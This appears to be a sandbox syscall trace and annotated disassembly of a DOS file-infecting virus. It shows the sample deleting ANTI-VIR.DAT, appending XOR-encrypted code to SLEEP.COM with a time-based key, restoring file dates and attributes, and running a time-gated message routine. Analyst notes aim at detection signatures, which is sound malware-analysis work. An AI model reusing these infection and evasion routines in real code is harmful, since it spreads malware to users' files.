2018-12-25T11:55:27.549191818Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx  ; save DX from Get time (INT 21h AH=2Ch: DH=seconds, DL=hundredths) as the XOR key
0x12c23: mov cx, 0x15  ; CX = 21, byte count for the write below
0x12c26: lea dx, word ptr [bp + 0x105]  ; DX -> 21-byte block; bp+0x105 + 0x15 = bp+0x11a, where the XOR source starts
0x12c2a: pop ax  ; function code is taken from the stack, not an immediate; it was pushed outside this excerpt
0x12c2b: int 0x21  ; logged in the trace as "Write 21 bytes on handle 5" (PC 12c2d)
0x12c2d: push ax  ; reserve a stack word; its value is overwritten below
0x12c2e: push bp
0x12c2f: mov bp, sp  ; temporary frame: [bp+0] = saved BP, [bp+2] = the word just pushed
0x12c31: mov word ptr [bp + 2], 0x4001  ; patch that word to 0x4001 (high byte 0x40 = DOS write) - presumably popped into AX before the next INT 21h, outside this excerpt
0x12c36: pop bp  ; restore BP, the base register for every data reference here
0x12c37: mov cx, 0x17b  ; loop count: 0x17b (379) words
0x12c3a: mov dx, word ptr [bp + 0x40f]  ; reload the saved time value as the key
0x12c3e: lea si, word ptr [bp + 0x11a]  ; SI -> source region
0x12c42: lea di, word ptr [bp + 0x4e7]  ; DI -> output buffer
0x12c46: lodsw ax, word ptr [si]  ; AX = next source word
0x12c47: xor ax, dx  ; one fixed 16-bit key for the whole region
0x12c49: stosw word ptr es:[di], ax  ; store the transformed word
0x12c4a: loop 0x12c46  ; repeat until CX reaches 0
0x12c4c: mov cx, 0x2f5  ; CX = 757; bp+0x11a + 0x2f5 = bp+0x40f, so the key word sits right after the region written
0x12c4f: lea dx, word ptr [bp + 0x4e7]  ; DX -> the XORed buffer for the 757-byte write
2018-12-25T11:55:27.553800733Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-25T11:55:27.556915242Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-25T11:55:27.566318515Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-25T11:55:27.570106016Z 66 PC: 12c7d | Move file pointer
2018-12-25T11:55:27.571987691Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:55:27.579990867Z 87 PC: 12c9c | Get or set file date and time
2018-12-25T11:55:27.582764545Z 62 PC: 12ca0 | Close file
2018-12-25T11:55:27.591257792Z 67 PC: 12caf | Get or set file attributes
2018-12-25T11:55:27.596251107Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.59943193Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.603368376Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:27.613325018Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:27.621033478Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:27.62824328Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:27.629956176Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:27.632706583Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:27.635680523Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:27.63858654Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:27.647094105Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:27.658622746Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:27.660255021Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:27.666889774Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:27.669059714Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:27.677035297Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:27.682976327Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.69739489Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:27.706914299Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:27.714036542Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:27.721170614Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:27.722574618Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:27.724922561Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:27.727677217Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:27.730596837Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:27.738349317Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:27.741713732Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:27.743197139Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:27.749631321Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:27.752412249Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:27.75980644Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:27.764602468Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.767538548Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:27.777290791Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:27.784184779Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:27.790607216Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:27.791937304Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:27.794281346Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:27.796923193Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:27.79975702Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:27.807459326Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:27.810253471Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:27.812258238Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:27.818685225Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:27.820476643Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:27.829602879Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:27.834128859Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.836910144Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:27.848012428Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:27.85445513Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:27.860568713Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:27.862537632Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:27.865126319Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:27.867397653Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:27.871178841Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:27.878997362Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:27.881699926Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:27.883939884Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:27.890540906Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:27.892227587Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:27.90077653Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:27.90602081Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.908923811Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:27.920556456Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:27.927077317Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:27.933283718Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:27.935487446Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:27.937935999Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:27.940028629Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:27.948327067Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:27.956961009Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:27.959618986Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:27.961885092Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:27.969103883Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:27.97126509Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:27.979648774Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:27.985681999Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.988560007Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:27.998318116Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:28.009531792Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:28.015997206Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:28.017701077Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:28.02131618Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:28.023665918Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:28.026754315Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:28.035590187Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:28.041261312Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:28.042924083Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:28.05062198Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:28.052242852Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:28.062647462Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:28.067878089Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:28.070497413Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:28.080050106Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:28.087360085Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:28.093697758Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:28.102767662Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:28.110471671Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:28.120195504Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:28.130144095Z 59 PC: 12aa1 | Change current directory
2018-12-25T11:55:28.134875944Z 71 PC: 12abe | Get current directory
2018-12-25T11:55:28.137625477Z 59 PC: 12ae8 | Change current directory
2018-12-25T11:55:28.14786366Z 59 PC: 12b03 | Change current directory
; Disassembly shown from the return address of the "Get time" call on the row below.
; Time-gated display routine: when the returned DX is 5 or less (seconds = 0 and
; hundredths <= 5) it sets video mode 0Dh, prints the zero-terminated string at
; [bp+0x3a4] with BIOS teletype output, waits for a keystroke and sets video mode 3;
; otherwise it jumps straight to 0x12b2e. The gate is a sub-second window once a
; minute, so a single sandbox run will usually not take this branch.
; NOTE(review): every row in this table is an INT 21h call, so the INT 10h/16h calls
; here would presumably not be logged even when the branch runs - confirm against the tracer.
2018-12-25T11:55:28.15054453Z 44 PC: 12b07 | Get time 0x12b07: cmp dx, 5  ; DX from Get time (INT 21h AH=2Ch: DH=seconds, DL=hundredths)
0x12b0a: ja 0x12b2e  ; unsigned DX > 5: skip the display routine
0x12b0c: mov ax, 0xd  ; AH=00h set video mode, AL=0Dh (320x200 16-colour graphics)
0x12b0f: int 0x10
0x12b11: lea si, word ptr [bp + 0x3a4]  ; SI -> message bytes
0x12b15: cld  ; string reads move forward
0x12b16: lodsb al, byte ptr [si]  ; AL = next character
0x12b17: or al, al  ; a zero byte ends the message
0x12b19: je 0x12b25
0x12b1b: mov ah, 0xe  ; INT 10h AH=0Eh teletype output
0x12b1d: xor bh, bh  ; display page 0
0x12b1f: mov bl, 5  ; colour 5
0x12b21: int 0x10
0x12b23: jmp 0x12b15  ; next character
0x12b25: xor ax, ax  ; AH=00h
0x12b27: int 0x16  ; BIOS keyboard read: blocks until a key is pressed
0x12b29: mov ax, 3  ; AH=00h set video mode, AL=03h (80x25 text)
0x12b2c: int 0x10
0x12b2e: push ax  ; both paths join here; the code continues outside this excerpt
0x12b2f: push bp
2018-12-25T11:55:28.152641919Z 26 PC: 12b3e | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":5819,"SideJobID":0}


Syscalls:

Time | Syscall Op (INT 21h function number from AH, in decimal) | PC | Syscall Name
2018-12-25T11:55:27.53669829Z 26 PC: 12a7e | Set disk transfer address
2018-12-25T11:55:27.538267141Z 71 PC: 12a88 | Get current directory
2018-12-25T11:55:27.541197925Z 67 PC: 12cd4 | Get or set file attributes
2018-12-25T11:55:27.546721967Z 65 PC: 12cd8 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T11:55:27.557356651Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:27.56836162Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:27.579166229Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:27.58482244Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:27.591346441Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:27.597028413Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:27.602803568Z 78 PC: 12a90 | Find first file
2018-12-25T11:55:27.614160478Z 67 PC: 12b92 | Get or set file attributes
2018-12-25T11:55:27.632175583Z 61 PC: 12ba7 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:27.653469963Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:55:27.677182787Z 66 PC: 12bf4 | Move file pointer
2018-12-25T11:55:27.67876634Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
; Disassembly shown from the return address of the "Get time" call on the row below.
; It saves the returned DX as a key, issues the 21-byte write from [bp+0x105], then
; XORs 0x17b words from [bp+0x11a] with that key into a buffer at [bp+0x4e7] and
; loads CX/DX for the 757-byte write logged at PC 12c61. The key comes from the
; clock, so those 757 bytes vary from file to file; the 21-byte block is written
; with no transformation in the visible code, which makes it the stabler thing to match on.
; The three consecutive writes in the trace add up to 21 + 757 + 35 = 813 bytes.
2018-12-25T11:55:27.681386968Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx  ; save DX from Get time (INT 21h AH=2Ch: DH=seconds, DL=hundredths) as the XOR key
0x12c23: mov cx, 0x15  ; CX = 21, byte count for the write below
0x12c26: lea dx, word ptr [bp + 0x105]  ; DX -> 21-byte block; bp+0x105 + 0x15 = bp+0x11a, where the XOR source starts
0x12c2a: pop ax  ; function code is taken from the stack, not an immediate; it was pushed outside this excerpt
0x12c2b: int 0x21  ; logged in the trace as "Write 21 bytes on handle 5" (PC 12c2d)
0x12c2d: push ax  ; reserve a stack word; its value is overwritten below
0x12c2e: push bp
0x12c2f: mov bp, sp  ; temporary frame: [bp+0] = saved BP, [bp+2] = the word just pushed
0x12c31: mov word ptr [bp + 2], 0x4001  ; patch that word to 0x4001 (high byte 0x40 = DOS write) - presumably popped into AX before the next INT 21h, outside this excerpt
0x12c36: pop bp  ; restore BP, the base register for every data reference here
0x12c37: mov cx, 0x17b  ; loop count: 0x17b (379) words
0x12c3a: mov dx, word ptr [bp + 0x40f]  ; reload the saved time value as the key
0x12c3e: lea si, word ptr [bp + 0x11a]  ; SI -> source region
0x12c42: lea di, word ptr [bp + 0x4e7]  ; DI -> output buffer
0x12c46: lodsw ax, word ptr [si]  ; AX = next source word
0x12c47: xor ax, dx  ; one fixed 16-bit key for the whole region
0x12c49: stosw word ptr es:[di], ax  ; store the transformed word
0x12c4a: loop 0x12c46  ; repeat until CX reaches 0
0x12c4c: mov cx, 0x2f5  ; CX = 757; bp+0x11a + 0x2f5 = bp+0x40f, so the key word sits right after the region written
0x12c4f: lea dx, word ptr [bp + 0x4e7]  ; DX -> the XORed buffer for the 757-byte write
2018-12-25T11:55:27.68425246Z 64 PC: 12c2d | Write file or device (Write 21 bytes on handle 5)
2018-12-25T11:55:27.690889809Z 64 PC: 12c61 | Write file or device (Write 757 bytes on handle 5)
2018-12-25T11:55:27.699727604Z 64 PC: 12c6b | Write file or device (Write 35 bytes on handle 5)
2018-12-25T11:55:27.705039186Z 66 PC: 12c7d | Move file pointer
2018-12-25T11:55:27.706457263Z 64 PC: 12c87 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:55:27.713175498Z 87 PC: 12c9c | Get or set file date and time
2018-12-25T11:55:27.714931781Z 62 PC: 12ca0 | Close file
2018-12-25T11:55:27.722949592Z 67 PC: 12caf | Get or set file attributes
2018-12-25T11:55:27.727859651Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.730790945Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.734453851Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:27.744346641Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:27.750836167Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:27.767371997Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:27.768858148Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:27.77279149Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:27.776186231Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:27.779503469Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:27.788405295Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:27.792482205Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:27.794186961Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:27.7998249Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:27.801721843Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:27.806671565Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:27.809852891Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.812610013Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:27.819122336Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:27.8234402Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:27.827888096Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:27.830008743Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:27.832403206Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:27.834928711Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:27.838320863Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:27.846402656Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:27.849350868Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:27.85157618Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:27.85865994Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:27.860457639Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:27.876884509Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:27.881431386Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.884541896Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:27.905579156Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:27.912573581Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:27.919485693Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:27.922395386Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:27.925208537Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:27.927694107Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:27.931866288Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:27.940410415Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:27.944179852Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:27.946625483Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:27.953689416Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:27.955445438Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:27.964117771Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:27.969317022Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:27.972305629Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:27.982279529Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:27.990952311Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:27.997256081Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:27.998607751Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:28.002044396Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:28.004425092Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:28.007575764Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:28.016679551Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:28.019304645Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:28.020756356Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:28.028296389Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:28.030228152Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:28.037750988Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:28.043850796Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:28.046450237Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:28.056021068Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:28.063635711Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:28.069816697Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:28.07121187Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:28.074275142Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:28.076946469Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:28.084947365Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:28.093895106Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:28.096501698Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:28.09779176Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:28.105010656Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:28.106465376Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:28.114105088Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:28.119413206Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:28.12201483Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:28.131639726Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:28.139152086Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:28.146851092Z 66 PC: 12bf4 | Move file pointer (See above)
2018-12-25T11:55:28.148520326Z 63 PC: 12c0b | Read file or device (See above)
2018-12-25T11:55:28.151926606Z 44 PC: 12c1f | Get time (See above)
2018-12-25T11:55:28.154689232Z 64 PC: 12c2d | Write file or device (See above)
2018-12-25T11:55:28.157817428Z 64 PC: 12c61 | Write file or device (See above)
2018-12-25T11:55:28.166036002Z 64 PC: 12c6b | Write file or device (See above)
2018-12-25T11:55:28.169822231Z 66 PC: 12c7d | Move file pointer (See above)
2018-12-25T11:55:28.171443821Z 64 PC: 12c87 | Write file or device (See above)
2018-12-25T11:55:28.178104692Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:28.180287605Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:28.188157922Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:28.193025898Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:28.196598455Z 67 PC: 12b92 | Get or set file attributes (See above)
2018-12-25T11:55:28.206413252Z 61 PC: 12ba7 | Open file (See above)
2018-12-25T11:55:28.21381788Z 63 PC: 12bbc | Read file or device (See above)
2018-12-25T11:55:28.22145384Z 87 PC: 12c9c | Get or set file date and time (See above)
2018-12-25T11:55:28.223239007Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T11:55:28.230829746Z 67 PC: 12caf | Get or set file attributes (See above)
2018-12-25T11:55:28.236769752Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:55:28.239426884Z 59 PC: 12aa1 | Change current directory
2018-12-25T11:55:28.243741646Z 71 PC: 12abe | Get current directory
2018-12-25T11:55:28.247939069Z 59 PC: 12ae8 | Change current directory
2018-12-25T11:55:28.258056918Z 59 PC: 12b03 | Change current directory
2018-12-25T11:55:28.260067698Z 44 PC: 12b07 | Get time 0x12b07: cmp dx, 5
; Analyst note: time-gated display routine, executed right after the Get time
; call (trace op 44 = INT 21h AH=2Ch, which returns DH=seconds, DL=hundredths).
; The compare above treats DX as one unsigned 16-bit value, so the routine only
; runs when seconds == 0 and hundredths <= 5; most runs take the skip branch.
; The excerpt stops at 0x12b2f, before the code at the join point completes.
0x12b0a: ja 0x12b2e                      ; DX > 5 (unsigned): skip the display, nothing visible happens
0x12b0c: mov ax, 0xd                     ; AH=00h set video mode, AL=0Dh (320x200, 16 colours)
0x12b0f: int 0x10
0x12b11: lea si, word ptr [bp + 0x3a4]   ; SI -> zero-terminated text at bp+0x3a4 (its content is not in this trace)
0x12b15: cld                             ; string reads go forward
0x12b16: lodsb al, byte ptr [si]         ; AL = next character
0x12b17: or al, al                       ; a zero byte ends the text
0x12b19: je 0x12b25
0x12b1b: mov ah, 0xe                     ; INT 10h AH=0Eh teletype output
0x12b1d: xor bh, bh                      ; display page 0
0x12b1f: mov bl, 5                       ; foreground colour 5 (honoured in graphics modes)
0x12b21: int 0x10
0x12b23: jmp 0x12b15                     ; back for the next character
0x12b25: xor ax, ax                      ; INT 16h AH=00h blocks until a key is pressed;
0x12b27: int 0x16                        ; an emulator that supplies no keystroke will stall here
0x12b29: mov ax, 3                       ; AH=00h, AL=03h: back to 80x25 text mode
0x12b2c: int 0x10
0x12b2e: push ax                         ; both paths rejoin here; what follows is outside the excerpt
0x12b2f: push bp                         ; (the next logged call is Set disk transfer address at PC 12b3e)
2018-12-25T11:55:28.263257655Z 26 PC: 12b3e | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":5819,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:55:28.623793254Z 26 PC: 12a7e | Set disk transfer address
2018-12-25T11:55:28.626577684Z 71 PC: 12a88 | Get current directory
2018-12-25T11:55:28.630198153Z 67 PC: 12cd4 | Get or set file attributes
2018-12-25T11:55:28.637005909Z 65 PC: 12cd8 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T11:55:28.643540372Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:28.65087437Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:28.663317417Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:28.67600713Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:28.687614575Z 67 PC: 12cd4 | Get or set file attributes (See above)
2018-12-25T11:55:28.694065438Z 65 PC: 12cd8 | Delete file (See above)
2018-12-25T11:55:28.701094276Z 78 PC: 12a90 | Find first file
2018-12-25T11:55:28.709415395Z 67 PC: 12b92 | Get or set file attributes
2018-12-25T11:55:28.72625309Z 61 PC: 12ba7 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:55:28.733670505Z 63 PC: 12bbc | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:55:28.74134505Z 66 PC: 12bf4 | Move file pointer
2018-12-25T11:55:28.743034787Z 63 PC: 12c0b | Read file or device (Read 7 bytes on handle 5)
2018-12-25T11:55:28.745760833Z 44 PC: 12c1f | Get time 0x12c1f: mov word ptr [bp + 0x40f], dx
; Analyst note: the instruction above stores DX from Get time (trace op 44 =
; INT 21h AH=2Ch; DH=seconds, DL=hundredths) at bp+0x40f. The loop below uses
; that word as a 16-bit XOR key, so the 757-byte block written at PC 12c61
; differs from one infected file to the next. The 21 bytes written first come
; straight from bp+0x105 with no transformation visible in this excerpt
; (presumably the part that stays comparable across samples; confirm on disk).
0x12c23: mov cx, 0x15                    ; 0x15 = 21 bytes, matches "Write 21 bytes" at PC 12c2d
0x12c26: lea dx, word ptr [bp + 0x105]   ; buffer for the first write
0x12c2a: pop ax                          ; function code taken from the stack, not an immediate; the trace logs op 64 (AH=40h, write)
0x12c2b: int 0x21
0x12c2d: push ax                         ; push the call's result, then ...
0x12c2e: push bp
0x12c2f: mov bp, sp
0x12c31: mov word ptr [bp + 2], 0x4001   ; ... overwrite that stack slot with 0x4001 (AH=40h)
0x12c36: pop bp                          ; BP restored; 0x4001 is left on top of the stack, presumably for a later pop ax
0x12c37: mov cx, 0x17b                   ; 0x17b = 379 words = 758 bytes to transform
0x12c3a: mov dx, word ptr [bp + 0x40f]   ; reload the saved time word as the key
0x12c3e: lea si, word ptr [bp + 0x11a]   ; source starts right after the 21-byte block (0x105 + 0x15)
0x12c42: lea di, word ptr [bp + 0x4e7]   ; destination: separate buffer, the source is left as it was
0x12c46: lodsw ax, word ptr [si]
